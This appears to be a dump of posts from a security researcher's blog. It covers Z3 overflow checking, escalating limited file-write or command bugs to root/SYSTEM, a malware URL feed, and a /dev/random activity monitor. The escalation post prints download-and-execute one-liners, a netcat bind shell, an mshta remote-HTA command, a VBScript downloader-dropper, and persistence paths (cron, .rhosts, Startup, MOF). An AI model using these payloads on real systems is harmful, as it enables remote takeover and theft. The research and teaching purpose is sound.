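MASK32 = 0xFFFFFFFF
LIMIT = 0x63FFFBB


def to_signed32(value):
    """Reinterpret a 32-bit value as a signed (two's complement) integer."""
    value &= MASK32
    return value - 0x100000000 if value & 0x80000000 else value


def passes_signed(x):
    """Signed check, as in the first (wrong) equation: x - 68 <= LIMIT."""
    return to_signed32(x - 68) <= LIMIT


def passes_unsigned(x):
    """Unsigned check, which is what ULE(x - 68, LIMIT) models."""
    return ((x - 68) & MASK32) <= LIMIT


def zero_allocation(x):
    """Second constraint: x + 68 wraps around to 0 in 32 bits."""
    return ((x + 68) & MASK32) == 0


x = 0xFFFFFFBC  # the model Z3 returned for the signed equation
print(zero_allocation(x), passes_signed(x), passes_unsigned(x))
```

<p>For 0xffffffbc, x - 68 is 0xffffff78: as a signed value that is -136, which is below the limit, but as an unsigned value it is far above it. As 0xffffffbc is the only 32-bit value for which x + 68 wraps to zero, the unsigned version has no solution, which matches the “unsat” answer.</p>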
<p><strong>Conclusion</strong></p>
<p>SMT solvers “may not be” a good solution for whole program analysis; however, they help vulnerability researchers a lot to determine whether a bug candidate is actually a bug when performing static analysis. Next time, instead of losing 1 or 2 hours trying to guess whether it is possible or not, I’ll just check satisfiability with Z3, and I recommend you do the same: humans are clumsy, machines are better for such tasks.</p>joxeanThis is a history of fail. I was analysing a piece of code, in assembly, that I thought would be vulnerable to a zero allocation bug allowing me to overwrite some bytes of heap space (overwriting a structure with many function pointers!). However, after spending like 2 hours analysing statically the “bug”, and documenting it, I finally discovered it wasn’t vulnerable. #Fail.Owning Unix and Windows systems with a (somewhat) limited vulnerability2013-07-09T07:34:10+02:002013-07-09T07:34:10+02:00http://joxeankoret.com/blog/2013/07/09/owning-unix-and-windows-systems-with-a-somewhat-limited-vulnerability<p>Auditing a product recently I noticed a curious scenario where I control the following:</p>
<ul>
  <li>Unix based: The limited vulnerability allows one to create any file as root, controlling the contents of that file. I can even overwrite existing files.</li>
<li>Windows based: The vulnerability allows one to execute an operating system command but doesn’t allow, for some reason, copying files as the Unix vulnerability allows.</li>
</ul>
<p>In the next paragraphs I will explain how one could exploit such somewhat limited vulnerabilities in order to execute arbitrary code remotely in the context of the running application (root under Unix and SYSTEM under Windows). I’ll also explain the opposite cases: in Unix based systems, one can execute an arbitrary operating system command but can’t create an arbitrary file; in Windows operating systems, one can create an arbitrary file anywhere in the system but cannot execute an arbitrary command.</p>
<!--more-->
<p><strong>Unix based systems: one can create a (text) file with controlled contents anywhere as root</strong></p>
<p>Under a Unix based system, like Linux, it’s trivial to execute arbitrary code when one can create a file as root anywhere. I’m listing here some of the most trivial examples that come to mind. The list is not exhaustive because I think it’s really hard to create a complete list for Unix based systems.</p>
<p><strong>Cron</strong></p>
<p>Create a file in /etc/cron.hourly (or /etc/cron.daily) and wait, at most, 1 hour. That’s all. One could also overwrite /etc/crontab directly (starting from the default version for the target operating system, if that information is known). Overwriting /etc/crontab is the easiest example that comes to mind and also the quickest way of executing code, because the attacker doesn’t need to wait up to 1 hour as with the previous example. Extracted from the <a href="http://www.manpagez.com/man/8/cron/">cron manpage</a>:</p>
<blockquote>
<p>…cron will then examine the modification time on all crontabs and reload those which have changed. Thus cron need not be restarted whenever a crontab file is modified.</p>
</blockquote>
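<p>The mechanism described in that quote, reloading a file when its modification time changes, can be sketched as follows. This is only an illustration of the idea, not cron’s actual implementation; the class name <code>MtimeWatcher</code> and the temporary file used in the demo are made up for this example:</p>

```python
import os
import tempfile


class MtimeWatcher:
    """Remember a file's modification time and report when it changes."""

    def __init__(self, path):
        self.path = path
        self.last_mtime = os.stat(path).st_mtime_ns

    def changed(self):
        """Return True once for every change of the modification time."""
        current = os.stat(self.path).st_mtime_ns
        if current != self.last_mtime:
            self.last_mtime = current
            return True
        return False


with tempfile.TemporaryDirectory() as tmp:
    path = os.path.join(tmp, "crontab")  # stand-in file, not the real crontab
    with open(path, "w") as handle:
        handle.write("# empty\n")

    watcher = MtimeWatcher(path)
    first = watcher.changed()   # nothing happened since the watcher was created

    # Simulate a later modification by moving the mtime 1 second forward.
    info = os.stat(path)
    os.utime(path, ns=(info.st_atime_ns, info.st_mtime_ns + 1_000_000_000))
    second = watcher.changed()  # the new mtime is noticed
    third = watcher.changed()   # and reported only once

print(first, second, third)
```

<p>A daemon polling its configuration files this way picks up a modified file at its next check, which is why no restart is needed.</p>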
<p><strong>Rhosts</strong></p>
<p>On some old Unix systems an attacker can create a <strong>.rhosts</strong> file in / or in any user’s $HOME directory with the content “+ +”. This entry allows anyone to log in remotely, from any host, via rlogin to the target machine. It would work, for example, in default installations of AIX (even 6.1).</p>
<p><strong>Default scripts</strong></p>
<p>In all Unix based operating systems there are plenty of shell scripts. As this “limited” vulnerability makes it possible to create a file anywhere with fully controlled contents, and even to overwrite existing files, another pretty easy way to take control of an affected machine is to take a default script from the target operating system, modify it and overwrite the original file. Examples of such files are System V init scripts, common cron scripts, specific shell scripts (like /etc/bashrc or /etc/profile), etc… The list of possible target files is too long to continue here.</p>
<p><strong>Unix based systems: one can execute an arbitrary operating system command as root</strong></p>
<p><strong>xterm</strong></p>
<p>With a Unix based operating system, if we can execute just one command as root it’s over without the need to do many things. The easiest and most typical command:</p>
<blockquote>
  <p>$ xterm -display attackers_machine:0</p>
</blockquote>
<p>…after executing “xhost +” or “xhost ip” on the attacker’s machine. This will pop up an xterm (a program typically installed in almost all Unix based operating systems) on the attacker’s machine, running with root privileges on the target machine. Game over.</p>
<p><strong>wget and curl</strong></p>
<p>Although not always installed in operating systems other than the BSDs and Linux, this is another typical way of exploiting such a vulnerability: we can download a script and execute as many operating system commands as we want. But we may need to execute 2 commands (i.e., it may require 2 shots) if the vulnerable target application doesn’t allow the use of operators like “|” or “&amp;&amp;” (as in my case). With just one command, supposing we can use some operators, one could execute one of the following commands:</p>
<blockquote>
  <p>$ wget http://url -O something.sh &amp;&amp; sh something.sh</p>
</blockquote>
<blockquote>
  <p>$ wget http://url -O - | sh</p>
</blockquote>
<blockquote>
  <p>$ wget http://url_with_an_elf -O elf_file &amp;&amp; chmod u+x elf_file &amp;&amp; ./elf_file</p>
</blockquote>
<blockquote>
  <p>$ curl http://url | sh</p>
</blockquote>
<blockquote>
  <p>$ wget http://url/netcat -O nc &amp;&amp; chmod u+x nc &amp;&amp; ./nc -l -p 4444 -e /bin/sh</p>
</blockquote>
<p><strong>Windows based systems: one can execute an arbitrary operating system command as SYSTEM</strong></p>
<p>In Windows we do not (typically) have utilities like curl or wget and, as far as I know, there is nothing that mimics such applications. However, there is a tool that can execute arbitrary remote code with some limitations: mshta. This tool, called “<a href="http://en.wikipedia.org/wiki/HTML_Application">Microsoft HTML Application Host</a>”, runs HTML+JavaScript/VBScript applications with privileges to execute operating system commands, create and write files, etc… It can execute not only local applications but also arbitrary remote applications with such privileges. Extracted from <a href="http://msdn.microsoft.com/en-us/library/ms536496(v=vs.85).aspx">here</a>:</p>
<blockquote>
<p>As fully trusted applications, HTAs carry out actions that Internet Explorer would never permit in a webpage. The result is an application that runs seamlessly, without interruption.</p>
<p>In HTAs, the restrictions against allowing script to manipulate the client machine are lifted. For example, all command codes are supported without scripting limitations (see <a href="http://msdn.microsoft.com/en-us/library/ms533049(v=vs.85).aspx">command id</a>). And HTAs have read/write access to the files and system registry on the client machine.</p>
<p>The trusted status of HTAs also extends to all operations subject to security zone options. In short, zone security is off. Consequently, HTAs run embedded Microsoft ActiveX controls and Java applets irrespective of the zone security setting on the client machine. No warning displays before such objects are run within an HTA. HTAs run outside of the Internet Explorer process, and therefore are not subject to the security restrictions imposed by Protected Mode when run on Windows Vista.</p>
</blockquote>
<p>Just what we want. An example command would look like the following:</p>
<blockquote>
<p>$ mshta http://remote_url/app.hta</p>
</blockquote>
<p>We can, for example, embed a PE (EXE) file in the HTA application with VBScript or JavaScript, decode it, write it to the local system and execute it. We can create such a VBScript file automatically with a tool like <a href="http://www.tarasco.org/security/exe_to_vbs_encoder/">EXETOVBS</a>:</p>
<div style="width: 559px" class="wp-caption aligncenter">
<img alt="EXETOVBS tool" src="http://www.tarasco.org/security/exe_to_vbs_encoder/VBS_Encoder.jpg" width="549" height="485" />
<p class="wp-caption-text">
EXETOVBS
</p>
</div>
<p>One could also use Metasploit as in this <a href="http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/honeywell_hscremotedeploy_exec.rb">exploit</a>. The only problem I see is that the generated VBScript files will be rather big. Another option: download an EXE file from the HTA application and run it. However, with the ways I know to download files (using the ActiveX object Microsoft.XMLHTTP) we may encounter (at least in Windows 7) the following error: “Safety settings on this computer prohibit accessing a data source in another domain”. Even downloading from the same domain: the HTA application uses the security settings from Internet Explorer to download files, although it doesn’t make any sense to me.</p>
<p>My solution to this problem is the following: embed another VBS or JS script in the HTA application, decode it, save it as a local file and execute it. As we aren’t running code in MSHTA any more (the application forbidding us to download remote files) but rather in <a href="http://en.wikipedia.org/wiki/Windows_Script_Host">Windows Script Host</a>, we can pretty much do anything we want. The following is the final HTA application that drops one VBS script and executes it; that script, in turn, downloads a PE file and runs it (well, not the complete code as I’m stripping the HTML code; just use the onload event of the body element to call this function and you’re done):</p>
<div class="geshi no vb">
<div class="head">
' Payload
</div>
<ol>
<li class="li1">
<div class="de1">
<span class="kw1">Sub</span> testing<span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Set</span> fso = <span class="kw1">CreateObject</span><span class="br0">(</span><span class="st0">"Scripting.FileSystemObject"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Set</span> MyFile = fso.<span class="me1">CreateTextFile</span><span class="br0">(</span><span class="st0">"script.vbs"</span>, <span class="kw1">True</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"ImageFile = "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"binary.exe"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"DestFolder = "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"URL = "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"http://url/binary.exe"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">""</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set xml = CreateObject("</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"Microsoft.XMLHTTP"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">")"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"xml.Open "</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"GET"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">", URL, False"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"xml.Send"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"set oStream = createobject("</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"Adodb.Stream"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">")"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Const adTypeBinary = 1"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Const adSaveCreateOverWrite = 2"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Const adSaveCreateNotExist = 1 "</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.type = adTypeBinary"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.open"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.write xml.responseBody"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.savetofile DestFolder & ImageFile, adSaveCreateNotExist"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"' oStream.savetofile DestFolder & ImageFile, adSaveCreateOverWrite"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"oStream.close"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"set oStream = nothing"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set xml = Nothing"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Dim objResult"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set objShell = CreateObject("</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">"WScript.Shell"</span> & <span class="kw1">chr</span><span class="br0">(</span><span class="nu0">34</span><span class="br0">)</span> & <span class="st0">")"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"objResult = objShell.Run(ImageFile, 1, True)"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="me1">WriteLine</span><span class="br0">(</span><span class="st0">"Set objShell = Nothing"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
MyFile.<span class="kw1">Close</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Dim</span> objResult
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">Set</span> objShell = <span class="kw1">CreateObject</span><span class="br0">(</span><span class="st0">"WScript.Shell"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
objResult = objShell.<span class="me1">Run</span><span class="br0">(</span><span class="st0">"script.vbs"</span>, <span class="nu0">1</span>, <span class="kw1">True</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
Window.<span class="kw1">Close</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">End</span> <span class="kw1">sub</span>
</div>
</li>
</ol>
</div>
<p><strong>Windows based systems: one can create an arbitrary (text) file with controlled contents anywhere as SYSTEM</strong></p>
<p>This is probably the most complex scenario. In Windows there is neither a crontab nor a directory like /etc/cron.hourly or /etc/cron.daily. But there are other approaches we can take in order to own such an operating system.</p>
<p><strong>Startup folders</strong></p>
<p>If we can create a file in a user’s startup folder, this file/script will be executed as soon as the user logs in. In Windows 7 one could create a file in the directory:</p>
<p>C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</p>
<p>…if we target a specific user, or in the following directory to affect all users in the system:</p>
<p>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup</p>
<p>We can use the previous VBS script to download an arbitrary EXE file to the target machine and execute it. However, there is one problem: what if no user logs in for days? We need to find other ways…</p>
<p><strong>MOF files</strong></p>
<p>I won’t expand on this topic too much as it’s very well explained <a href="http://poppopret.blogspot.fr/2011/09/playing-with-mof-files-on-windows-for.html">here</a>; I’ll only explain the basics. In a nutshell, a file with the extension .MOF created in the directory <strong>%SystemRoot%\System32\wbem\mof\ </strong>is automatically compiled and registered in the WMI repository in Windows operating systems &lt;= Vista. A MOF file can define a handler of system events that executes arbitrary code (i.e., VBScript). If we create a .MOF file that handles any event by executing the previous .VBS script we will, almost instantly, execute that code.</p>
<p>However, as pointed out by Joshua Drake, MOF files are not “automagically” compiled in Vista+. Probably (but I didn’t test it), if uploading binary files is allowed, one could upload an already compiled MOF file. But, I repeat, this is only a theoretical attack as I have not tested it myself (UPDATE: Joshua Drake says it’s possible). Anyway, we have more options to choose from.</p>
<p><strong>Task Scheduler</strong></p>
<p>This service is the Windows equivalent of Unix cron. But it isn’t as easy as with /etc/cron.hourly or /etc/cron.daily: placing a file in the corresponding directory doesn’t make it run automatically, as the task must be registered in the registry. But what about overwriting the files used by commonly (default) installed tasks? In the following <a href="http://support.microsoft.com/kb/939039">list</a> there are several that look very interesting:</p>
<table id="MT3" cellspacing="0">
<tr>
<td>
GatherWirelessInfo
</td>
<td>
Wireless
</td>
<td>
This scheduled task runs the <strong>Gatherwirelessinfo.vbs</strong> file to collect wireless networking data. This scheduled task collects configuration information and state information about the computer. This information is displayed in a report. This information is included in the system logs. This information also appears in Performance Monitor.
</td>
</tr>
<tr>
<td>
GatherWiredInfo
</td>
<td>
Wired
</td>
<td>
This scheduled task runs the <strong>Gatherwiredinfo.vbs</strong> file to collect wired networking data. This scheduled task collects configuration information and state information about the system. This information appears in a report. This information also appears in the system logs. This information also appears in Performance Monitor.
</td>
</tr>
</table>
<p>We have 2 tasks installed by default (Wireless and Wired) in Windows Vista that use 2 VBS scripts (which are text files). So, it’s as easy as grabbing a copy of those files, modifying them to embed our payload (the previous VBS script) and then overwriting one or both of them. That’s all. Nevertheless, it doesn’t work on at least Windows 7 as these tasks are not there any more.</p>
<p><strong>Conclusion</strong></p>
<p>Although the exploitation techniques explained here are not new, I think that such a list can be useful. For example, I was unaware of the .MOF files feature and it could have helped me in the past. Perhaps this list can be of help to somebody else.</p>
<p>PS: If you happen to know another cool technique, please post it in the comments!</p>joxeanAuditing a product recently I noticed a curious scenario where I control the following:Malware URLs2013-01-26T09:37:56+01:002013-01-26T09:37:56+01:00http://joxeankoret.com/blog/2013/01/26/malware-urls<p>It’s been a while since I started writing <a href="http://joxeankoret.com/blog/2012/08/25/finding-malware-spam-in-twitter/">a first prototype</a> to try to catch as much malware (URLs and samples) as possible. Today I can say my project is all grown up as it’s generating, daily, a feed with around 9.000 malware URLs and with a low rate of false positives (although there may be some).</p>
<p>At first, the process of finding malware URLs in my tool was only a matter of finding suspicious URLs in social networks (Twitter and Identi.ca) and checking mail accounts receiving loads of bad stuff, nothing else. Today I’m using crawlers, honeypots, sandboxes, third-party public URL feeds, private URL feeds (provided under consent), executable unpackers, heuristic engines for Flash movies, PDFs, OLE2 documents, etc… It changed a lot and became a big project that, I hope, can give useful information to malware researchers.</p>
<p> <!--more--></p>
<p>As of today, the final result the general public can see is just a single plain text file, usable with <a href="http://adblockplus.org/">AdBlock</a>, with all the URLs of the last week (you can grab the latest version of the feed at this <a href="http://malwareurls.joxeankoret.com/normal.txt">link</a>). However, in some weeks (perhaps months) we (a friend of mine and I) plan to add a web page and publish an API to let users do, at least, the following actions:</p>
<ol>
<li>Check URLs</li>
<li>Find URLs or domains</li>
  <li>Find how a piece of malware appeared/spread</li>
  <li>Find similar malware during a given time frame</li>
  <li>Set up notifications for known malware reappearing</li>
  <li>Set up notifications for similar malware</li>
  <li>Set up notifications for similar URL patterns</li>
<li>etc…</li>
</ol>
<p>It will take a while to finish the web page and the API service, but it should be finished in a couple of weeks (if our jobs permit, as it’s a side project we work on in our spare time).</p>
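<p>Until that API exists, the first action of the list (checking a URL) can be approximated locally against the plain text feed. The following is a minimal sketch that assumes one URL per line and that lines starting with “!”, “[” or “#” are comments or headers; both are assumptions about the file format, and the function names and sample entries are hypothetical:</p>

```python
from urllib.parse import urlsplit


def load_feed(lines):
    """Return the set of URLs in the feed, skipping blanks and comment lines."""
    urls = set()
    for line in lines:
        line = line.strip()
        if not line or line.startswith(("!", "[", "#")):
            continue
        urls.add(line)
    return urls


def hosts(urls):
    """Return the lower-cased host names that appear in a set of URLs."""
    result = set()
    for url in urls:
        # urlsplit only fills in the host when a scheme separator is present.
        parts = urlsplit(url if "://" in url else "//" + url)
        if parts.hostname:
            result.add(parts.hostname.lower())
    return result


# Hypothetical sample lines; the real feed would be read from the text file.
sample = [
    "! hypothetical comment line",
    "http://bad.example/payload.exe",
    "evil.example/dropper.php",
    "",
]

feed = load_feed(sample)
print("http://bad.example/payload.exe" in feed)
print("evil.example" in hosts(feed))
```

<p>Matching on the host name as well as on the full URL catches new paths on an already known domain, at the cost of more false positives on shared hosting.</p>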
<p>Meanwhile, while my friend and I continue working on this project, we want to show you some fancy graphs of the statistics of this project:</p>
<p><a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/daily_urls/" rel="attachment wp-att-3394"><img class="aligncenter size-large wp-image-3394" alt="daily_urls" src="http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls-1024x277.png" width="550" height="148" srcset="http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls-1024x277.png 1024w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls-300x81.png 300w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/daily_urls.png 1174w" sizes="(max-width: 550px) 100vw, 550px" /></a></p>
<p> </p>
<p><a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/heuristics/" rel="attachment wp-att-3396"><img class="aligncenter size-full wp-image-3396" alt="Heuristics" src="http://joxeankoret.com/blog/wp-content/uploads/2013/01/heuristics.png" width="463" height="351" srcset="http://joxeankoret.com/blog/wp-content/uploads/2013/01/heuristics.png 463w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/heuristics-300x227.png 300w" sizes="(max-width: 463px) 100vw, 463px" /></a></p>
<p> </p>
<p><a href="http://joxeankoret.com/blog/2013/01/26/malware-urls/full_av_names/" rel="attachment wp-att-3398"><img class="aligncenter size-full wp-image-3398" alt="full_av_names" src="http://joxeankoret.com/blog/wp-content/uploads/2013/01/full_av_names.png" width="545" height="392" srcset="http://joxeankoret.com/blog/wp-content/uploads/2013/01/full_av_names.png 545w, http://joxeankoret.com/blog/wp-content/uploads/2013/01/full_av_names-300x215.png 300w" sizes="(max-width: 545px) 100vw, 545px" /></a></p>
<p> </p>
<p>NOTE: The Antivirus information is obtained thanks to <a href="http://www.virustotal.com">VirusTotal</a>.</p>
<p> </p>joxeanIt’s been a while since I started writing a first prototype to try to catch as much malware (URLs and samples) as possible. Today I can say my project is all grown up as it’s generating, daily, a feed with around 9.000 malware URLs and with a low rate of false positives (although there may be some).A simple activity monitor with /dev/random2012-11-24T18:01:55+01:002012-11-24T18:01:55+01:00http://joxeankoret.com/blog/2012/11/24/a-simple-activity-monitor-with-devrandom<p>Today I was performing some tests on the random number generators of some browsers and found, by chance, <a href="http://www.ouah.org/entropykeystroke.html">this mail</a> sent to <a href="http://www.securityfocus.com/archive/1">Bugtraq</a> by Michal Zalewski called “Unix entropy source can be used for keystroke timing attacks”. While Michal’s idea is very good, I failed to find a reliable way of doing it on my home computer after some time (well, honestly, after just 1 hour…). However, a simpler idea came to mind: if /dev/random blocks when the entropy pool is empty and most of the entropy events are generated when mouse or keyboard events happen, I can, at least, quite easily write an activity monitor based on /dev/random.</p>
<!--more-->
<p><strong>A simple activity monitor</strong></p>
<p>The idea is very simple: read all available data in /dev/random and then, depending on the intervals at which new data becomes available, try to determine if the mouse or the keyboard is being used. For this I created the following simple Python script:</p>
<div class="geshi no python">
<div class="head">
#!/usr/bin/python
</div>
<ol>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">import</span> <span class="kw3">time</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">import</span> <span class="kw3">select</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
          ACTIVITY_MOUSE = <span class="nu0">0</span>
</div>
</li>
<li class="li1">
<div class="de1">
ACTIVITY_KEYBOARD = <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">def</span> wait_for_activity<span class="br0">(</span><span class="br0">)</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="st0">""</span><span class="st0">" Returns (0, time) for mouse and (1, time) for keyboard activity.</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="st0"> Note, however, that the metrics are just a guess. "</span><span class="st0">""</span>
</div>
</li>
<li class="li1">
<div class="de1">
started = <span class="kw2">True</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
f = <span class="kw2">open</span><span class="br0">(</span><span class="st0">"/dev/random"</span>, <span class="st0">"rb"</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
          f.<span class="me1">seek</span><span class="br0">(</span><span class="nu0">2</span>, <span class="nu0">0</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
          keyboard = <span class="nu0">0</span>
</div>
</li>
<li class="li1">
<div class="de1">
          mouse = <span class="nu0">0</span>
</div>
</li>
<li class="li1">
<div class="de1">
ret = <span class="kw2">None</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">while</span> ret <span class="kw1">is</span> <span class="kw2">None</span>:
</div>
</li>
<li class="li1">
<div class="de1">
t = <span class="kw3">time</span>.<span class="kw3">time</span><span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw3">select</span>.<span class="kw3">select</span><span class="br0">(</span><span class="br0">[</span>f<span class="br0">]</span>, <span class="br0">[</span><span class="br0">]</span>, <span class="br0">[</span><span class="br0">]</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
f.<span class="me1">read</span><span class="br0">(</span><span class="nu0">8</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
t = <span class="kw3">time</span>.<span class="kw3">time</span><span class="br0">(</span><span class="br0">)</span>-t
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> started:
</div>
</li>
<li class="li1">
<div class="de1">
started = <span class="kw2">False</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">continue</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> t <span class="sy0">&lt;=</span> <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> mouse <span class="sy0">&gt;=</span> <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
ret = <span class="br0">(</span><span class="nu0">0</span>, t<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
mouse += <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
keyboard -= <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">elif</span> t <span class="sy0">&lt;=</span> <span class="nu0">5</span>:
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">if</span> keyboard <span class="sy0">&gt;=</span> <span class="nu0">1</span>:
</div>
</li>
<li class="li1">
<div class="de1">
ret = <span class="br0">(</span><span class="nu0">1</span>, t<span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
keyboard += <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
mouse -= <span class="nu0">1</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">else</span>:
</div>
</li>
<li class="li1">
<div class="de1">
keyboard = mouse = <span class="nu0">0</span>
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
<li class="li1">
<div class="de1">
f.<span class="me1">close</span><span class="br0">(</span><span class="br0">)</span>
</div>
</li>
<li class="li1">
<div class="de1">
<span class="kw1">return</span> ret
</div>
</li>
<li class="li1">
<div class="de1">
</div>
</li>
